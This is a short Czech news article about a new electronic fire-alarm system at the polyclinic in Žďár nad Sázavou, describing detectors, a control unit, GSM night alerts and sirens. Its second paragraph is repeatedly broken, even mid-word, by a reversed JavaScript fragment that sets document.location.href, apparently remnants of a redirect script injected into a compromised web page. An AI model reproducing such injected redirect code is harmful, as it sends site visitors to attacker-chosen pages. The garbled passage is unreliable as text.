Rainbow page separator

Polikliniku zabezpečí nový protipožární elektronický systém

Neděle, 7. března 2021

Poliklinika Žďár nad Sázavou

Žďár nad Sázavou / Do konce března bude v objektu žďárské polikliniky nainstalovaný nový protipožární systém – stavební práce probíhají od začátku února. Systém má pomocí včasných signálů z hlásičů přijímaných ústřednou zajistit požární bezpečnosti budovy, tamních ambulancí i všech návštěvníků polikliniky. V denním režimu ústřednu zajistí obsluha, v nočních hodinách se informace o případném vypuknutí požáru k pověřeným pracovníkům dostane pomocí GSM brány.
Umístění požárních hlásičů, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jak samočinných, tak tlačítkových, je naplánováno v místnostech i na chodbách. Do ústředny přijdou signály o jednotlivých provozních stavech zařízení, které budou vyhodnoceny, a na základě [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho přímo či na dálku ovládána veškerá zařízení, která je v případě vypuknutí ohně nutné uzavřít, anebo naopak spustit. Požární poplach se bude v budově polikliniky vyhlašovat akusticky pomocí sirén napojených na linku ústředny, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to buď po zjištění požáru detek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory elektronického protipožárního systému, popřípadě po stisknutí tlačítkového hlásiče.